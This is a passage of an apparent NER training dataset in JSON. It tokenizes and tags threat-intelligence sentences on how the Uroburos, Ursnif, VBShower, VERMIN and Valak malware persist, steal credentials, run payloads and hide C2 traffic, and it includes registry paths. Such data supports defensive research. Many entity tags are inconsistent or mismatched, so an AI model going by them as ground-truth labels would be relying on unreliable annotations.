"`HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds.`" ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "concealed", "storage", "mechanisms", "including", "an", "NTFS", "or", "FAT-16", "filesystem", "encrypted", "with", "CAST-128", "in", "CBC", "mode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "a", "`Put`", "command", "to", "write", "files", "to", "an", "infected", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "the", "ability", "to", "move", "data", "between", "its", "kernel", "and", "user", "mode", "components,", "generally", "using", "named", "pipes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Uroburos", "can", "add", "extra", "characters", "in", "encoded", "strings", "to", "help", "mimic", "DNS", "legitimate", "requests." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "custom", "communications", "protocols", "that", "ride", "over", "SMTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "registered", "a", "service", "named", "`WerFaultSvc`,", "likely", "to", "spoof", "the", "legitimate", "Windows", "error", "reporting", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "store", "configuration", "information", "in", "the", "Registry", "including", "the", "initialization", "vector", "and", "AES", "key", "needed", "to", "find", "and", "decrypt", "other", "Uroburos", "components." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Individual", "Uroburos", "implants", "can", "use", "multiple", "communication", "channels", "based", "on", "one", "of", "four", "available", "modes", "of", "operation." ], "ner_tags": [ "O", "B-Idus", "O", "O", "I-Features", "I-Features", "I-Features", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "implants", "on", "multiple", "compromised", "machines", "to", "proxy", "communications", "through", "its", "worldwide", "P2P", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "native", "Windows", "APIs", "including", "`GetHostByName`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Uroburos", "can", "communicate", "through", "custom", "methodologies", "for", "UDP,", "ICMP,", "and", "TCP", "that", "use", "distinct", "sessions", "to", "ride", "over", "the", "legitimate", "protocols." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "a", "custom", "base62", "and", "a", "de-facto", "base32", "encoding", "that", "uses", "digits", "0-9", "and", "lowercase", "letters", "a-z", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "its", "`Process", "List`", "command", "to", "enumerate", "processes", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "custom", "communication", "methodologies", "that", "ride", "over", "common", "protocols", "including", "TCP,", "UDP,", "HTTP,", "SMTP,", "and", "DNS", "in", "order", "to", "blend", "with", "normal", "network", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Uroburos", "has", "the", "ability", "to", "communicate", "over", "custom", "communications", "methodologies", "that", "ride", "over", "common", "network", "protocols", "including", "raw", "TCP", "and", "UDP", "sockets,", "HTTP,", "SMTP,", "and", "DNS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "B-Way", "B-Tool", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Uroburos", "can", "query", "the", "Registry,", "typically", "`HKLM:\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds`,", "to", "find", "the", "key", "and", "path", "to", "decrypt", "and", "load", "its", "kernel", "driver", "and", "kernel", "driver", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "the", "ability", "to", "load", "new", "modules", "directly", "into", "memory", "using", "its", "`Load", "Modules", "Mem`", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Way", "I-Tool", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "its", "kernel", "module", "to", "prevent", "its", "host", "components", "from", "being", "listed", "by", "the", "targeted", "system's", "OS", "and", "to", "mediate", "requests", "between", "user", "mode", "and", "concealed", "components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "uses", "a", "custom", "packer." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Uroburos", "can", "encrypt", "the", "data", "beneath", "its", "http2", "or", "tcp", "encryption", "at", "the", "session", "layer", "with", "CAST-128,", "using", "a", "different", "key", "for", "incoming", "and", "outgoing", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "the", "ability", "to", "gather", "basic", "system", "information", "and", "run", "the", "POSIX", "API", "`gethostbyname`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "Uroburos", "can", "intercept", "the", "first", "client", "to", "server", "packet", "in", "the", "3-way", "TCP", "handshake", "to", "determine", "if", "the", "packet", "contains", "the", "correct", "unique", "value", "for", "a", "specific", "Uroburos", "implant.", "If", "the", "value", "does", "not", "match,", "the", "packet", "and", "the", "rest", "of", "the", "TCP", "session", "are", "passed", "to", "the", "legitimate", "listening", "application." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "can", "use", "a", "custom", "HTTP-based", "protocol", "for", "large", "data", "communications", "that", "can", "blend", "with", "normal", "network", "traffic", "by", "riding", "on", "top", "of", "standard", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "B-Way", "B-Tool", "O", "O", "I-Idus", "I-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Uroburos", "has", "the", "ability", "to", "use", "the", "command", "line", "for", "execution", "on", "the", "targeted", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uroburos", "has", "registered", "a", "service,", "typically", "named", "`WerFaultSvc`,", "to", "decrypt", "and", "find", "a", "kernel", "driver", "and", "kernel", "driver", "loader", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "Ursnif", "has", "injected", "HTML", "codes", "into", "banking", "sites", "to", "steal", "sensitive", "online", "banking", "information", "(ex:", "usernames", "and", "passwords)." ], "ner_tags": [ "B-Idus", "O", "I-Way", "B-Way", "B-Way", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "droppers", "execute", "base64", "encoded", "PowerShell", "commands." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "droppers", "have", "used", "COM", "objects", "to", "execute", "the", "malware's", "full", "executable", "payload." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "hooked", "APIs", "to", "perform", "a", "wide", "variety", "of", "information", "theft,", "such", "as", "monitoring", "traffic", "from", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O", "O", "O", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "encoded", "data", "in", "HTTP", "URLs", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "collected", "files", "from", "victim", "machines,", "including", "certificates", "and", "cookies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "crypto", "key", "information", "stored", "in", "the", "Registry", "to", "decrypt", "Tor", "clients", "dropped", "to", "disk." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "a", "DGA", "to", "generate", "domain", "names", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "an", "XOR-based", "algorithm", "to", "encrypt", "Tor", "clients", "dropped", "to", "disk.", "Ursnif", "droppers", "have", "also", "been", "delivered", "as", "password-protected", "zip", "files", "that", "execute", "base64", "encoded", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "HTTP", "POSTs", "to", "exfil", "gathered", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "deleted", "data", "staged", "in", "tmp", "files", "after", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "droppers", "have", "used", "COM", "properties", "to", "execute", "malware", "in", "hidden", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "dropped", "payload", "and", "configuration", "files", "to", "disk.", "Ursnif", "has", "also", "been", "used", "to", "download", "and", "execute", "additional", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Ursnif", "has", "used", "tmp", "files", "to", "stage", "gathered", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "strings", "from", "legitimate", "system", "files", "and", "existing", "folders", "for", "its", "file,", "folder,", "and", "Registry", "entry", "names." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "Registry", "modifications", "as", "part", "of", "its", "installation", "routine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "Tor", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "<code>CreateProcessW</code>", "to", "create", "child", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "droppers", "have", "used", "PowerShell", "in", "download", "cradles", "to", "download", "and", "execute", "the", "malware's", "full", "executable", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "gathered", "information", "about", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "process", "hollowing", "to", "inject", "into", "child", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "a", "peer-to-peer", "(P2P)", "network", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "Reg", "to", "query", "the", "Registry", "for", "installed", "programs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "Registry", "Run", "keys", "to", "establish", "automatic", "execution", "at", "system", "startup." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "copied", "itself", "to", "and", "infected", "removable", "drives", "for", "propagation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "hooked", "APIs", "to", "take", "screenshots." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "Systeminfo", "to", "gather", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Ursnif", "has", "gathered", "information", "about", "running", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "Ursnif", "has", "copied", "itself", "to", "and", "infected", "files", "in", "network", "drives", "for", "propagation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Ursnif", "has", "injected", "code", "into", "target", "processes", "via", "thread", "local", "storage", "callbacks." ], "ner_tags": [ "B-Idus", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "a", "30", "minute", "delay", "after", "execution", "to", "evade", "sandbox", "monitoring", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "droppers", "have", "used", "VBA", "macros", "to", "download", "and", "execute", "the", "malware's", "full", "executable", "payload." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "used", "HTTPS", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Ursnif", "droppers", "have", "used", "WMI", "classes", "to", "execute", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ursnif", "has", "registered", "itself", "as", "a", "system", "service", "in", "the", "Registry", "for", "automatic", "execution", "at", "system", "startup." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VBShower", "has", "attempted", "to", "complicate", "forensic", "analysis", "by", "deleting", "all", "the", "files", "contained", "in", "<code>%APPDATA%\\..\\Local\\Temporary", "Internet", "Files\\Content.Word</code>", "and", "<code>%APPDATA%\\..\\Local", "Settings\\Temporary", "Internet", "Files\\Content.Word\\</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "VBShower", "has", "the", "ability", "to", "download", "VBS", "files", "to", "the", "target", "computer." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "VBShower", "used", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}</code>", "to", "maintain", "persistence." ], "ner_tags": [ "B-Way", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "VBShower", "has", "the", "ability", "to", "execute", "VBScript", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "VBShower", "has", "attempted", "to", "obtain", "a", "VBS", "script", "from", "command", "and", "control", "(C2)", "nodes", "over", "HTTP." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "VERMIN", "encrypts", "the", "collected", "files", "using", "3-DES." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "VERMIN", "can", "perform", "audio", "capture." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "saves", "each", "collected", "file", "with", "the", "automatically", "generated", "format", "{0:dd-MM-yyyy}.txt", "." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "VERMIN", "collects", "data", "stored", "in", "the", "clipboard." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "decrypts", "code,", "strings,", "and", "commands", "to", "use", "once", "it's", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "is", "obfuscated", "using", "the", "obfuscation", "tool", "called", "ConfuserEx." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "VERMIN", "can", "delete", "files", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "can", "download", "and", "upload", "files", "to", "the", "victim's", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "collects", "keystrokes", "from", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "can", "get", "a", "list", "of", "the", "processes", "and", "running", "tasks", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "can", "perform", "screen", "captures", "of", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "uses", "WMI", "to", "check", "for", "anti-virus", "software", "installed", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "is", "initially", "packed." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features" ] }, { "tokens": [ "VERMIN", "collects", "the", "OS", "name,", "machine", "name,", "and", "architecture", "information." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "gathers", "the", "local", "IP", "address." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "gathers", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "VERMIN", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "download", "a", "module", "to", "search", "for", "and", "build", "a", "report", "of", "harvested", "credential", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "use", "the", "clientgrabber", "module", "to", "steal", "e-mail", "credentials", "from", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "decode", "and", "decrypt", "downloaded", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "enumerate", "domain", "admin", "accounts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "execute", "tasks", "via", "OLE." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "exfiltrate", "data", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "communicate", "over", "multiple", "C2", "hosts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "store", "information", "regarding", "the", "C2", "server", "and", "downloads", "in", "the", "Registry", "key", "<code>HKCU\\Software\\ApplicationContainer\\Appsw64</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "downloaded", "a", "variety", "of", "modules", "and", "payloads", "to", "the", "compromised", "host,", "including", "IcedID", "and", "NetSupport", "Manager", "RAT-based", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Valak", "can", "execute", "JavaScript", "containing", "configuration", "data", "for", "establishing", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "enumerate", "local", "admin", "accounts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "Valak", "has", "been", "executed", "via", "Microsoft", "Word", "documents", "containing", "malicious", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "modify", "the", "Registry", "key", "<code>HKCU\\Software\\ApplicationContainer\\Appsw64</code>", "to", "store", "information", "regarding", "the", "C2", "server", "and", "downloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "download", "additional", "modules", "and", "malware", "capable", "of", "using", "separate", "C2", "channels." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "save", "and", "execute", "files", "as", "alternate", "data", "streams", "(ADS)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "base64", "encode", "and", "XOR", "encrypt", "strings." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "used", "PowerShell", "to", "download", "additional", "modules." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "enumerate", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "use", "the", "Registry", "for", "code", "updates", "and", "to", "collect", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "Valak", "has", "used", "<code>regsvr32.exe</code>", "to", "launch", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "collect", "sensitive", "mailing", "information", "from", "Exchange", "servers,", "including", "credentials", "and", "the", "domain", "certificate", "of", "an", "enterprise." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "used", "scheduled", "tasks", "to", "execute", "additional", "payloads", "and", "to", "gain", "persistence", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "take", "screenshots", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "determine", "if", "a", "compromised", "host", "has", "security", "products", "installed." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "used", "packed", "DLL", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Valak", "has", "been", "delivered", "via", "spearphishing", "e-mails", "with", "password", "protected", "ZIP", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "been", "delivered", "via", "malicious", "links", "in", "e-mail." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Valak", "has", "returned", "C2", "data", "as", "encoded", "ASCII." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "determine", "the", "Windows", "version", "and", "computer", "name", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "the", "ability", "to", "identify", "the", "domain", "and", "the", "MAC", "and", "IP", "addresses", "of", "an", "infected", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "gather", "information", "regarding", "the", "user." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Valak", "has", "used", "HTTP", "in", "communications", "with", "C2." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "use", "a", ".NET", "compiled", "module", "named", "exchgrabber", "to", "enumerate", "credentials", "from", "the", "Credential", "Manager." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Valak", "can", "use", "<code>wmic", "process", "call", "create</code>", "in", "a", "scheduled", "task", "to", "launch", "plugins", "and", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", 